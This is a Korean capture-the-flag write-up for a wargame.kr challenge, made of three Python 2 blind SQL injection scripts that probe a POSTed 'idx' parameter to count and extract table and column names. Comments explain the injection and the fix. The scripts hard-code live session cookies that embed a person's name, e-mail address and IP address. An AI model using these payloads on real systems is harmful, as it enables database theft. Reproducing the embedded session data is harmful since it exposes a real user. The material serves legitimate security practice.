post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스 


# -*- coding: utf-8 -*-
# Table-count probe (write-up script; Python 2 only: print statements, urllib2).
# Every request POSTs an `idx` value into which a SQL expression has been
# concatenated, and the response is compared against a fixed marker string.
# That this changes the server's answer indicates the endpoint interpolates
# `idx` into its query unquoted and unvalidated; the server-side fix is to bind
# `idx` as a query parameter (or cast it to an integer) instead of building
# the SQL string by concatenation.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): a live session id is hard-coded here, and the ci_session
# cookie sent below is a serialized session blob that embeds the account's
# display name and e-mail address. Session material should come from the
# environment or an untracked local file, not from a script that gets
# published with a write-up.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

for i in range(50):
    # The IF() in the injected value evaluates to the original idx (17038) when
    # the guessed count equals i and to 0 otherwise, so the two cases are
    # expected to render differently.
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    # Both cookies are required for the request to be treated as the
    # logged-in session; see the note on PHPSESSID above.
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    res = urllib2.urlopen(req).read()

    # The fixed timestamp is used as the "condition was true" marker; it is
    # presumably the text rendered for idx 17038 -- confirm against the page.
    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        sys.exit(1)  # unreachable: the `break` above already leaves the loop
# -*- coding: utf-8 -*-
# Table-name probe (write-up script; Python 2 only: print statements, urllib2).
# Same injection point as the table-count script above (`idx` POSTed to
# chk.php and interpolated into SQL), same fixed marker string as the
# true/false signal. Three nested loops: n selects one row of
# information_schema.tables via `limit n,1`, i is the character position and
# j the candidate byte value, so one request is sent per (n, i, j) triple.
# The defect being demonstrated is on the server: `idx` must be bound as a
# parameter or cast to an integer, never concatenated into the query.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): live session id hard-coded; the ci_session cookie below is a
# serialized session that embeds the account's display name and e-mail.
# Keep such values out of published scripts (environment / untracked file).
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

n = 40
while n < 43:
    flag = ""  # characters recovered for the table row selected by n
    for i in range(40):
        for j in range(36,90):
            # The candidate byte is sent as a hex literal (hex(j)[2:] strips the
            # "0x" prefix Python adds, which is then re-added as SQL syntax).
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            res = urllib2.urlopen(req).read()

            # Marker present => the guessed byte matched; append it and move to
            # the next position. If no candidate matches, the position is
            # silently skipped (nothing is appended), so `flag` can be shorter
            # than the real name.
            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                break
                sys.exit(1)  # unreachable: the `break` above already leaves the loop
    print "[*]Find flag! : " + flag
    n += 1
# Column-count probe (write-up script; Python 2 only: print statement, urllib2).
# A single request this time: the injected IF() compares the number of rows in
# information_schema.columns with a fixed guess (486) and the raw response is
# printed for manual inspection rather than checked for a marker string.
# Note the different idx (17053) and a different ci_session cookie than the two
# scripts above -- presumably captured from a later session.
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): hard-coded session id; the ci_session value below embeds the
# account's display name and e-mail address. Do not publish live session
# material with a write-up.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
res = urllib2.urlopen(req).read()
# Whole response body is dumped; the reader decides whether the guess held.
print res

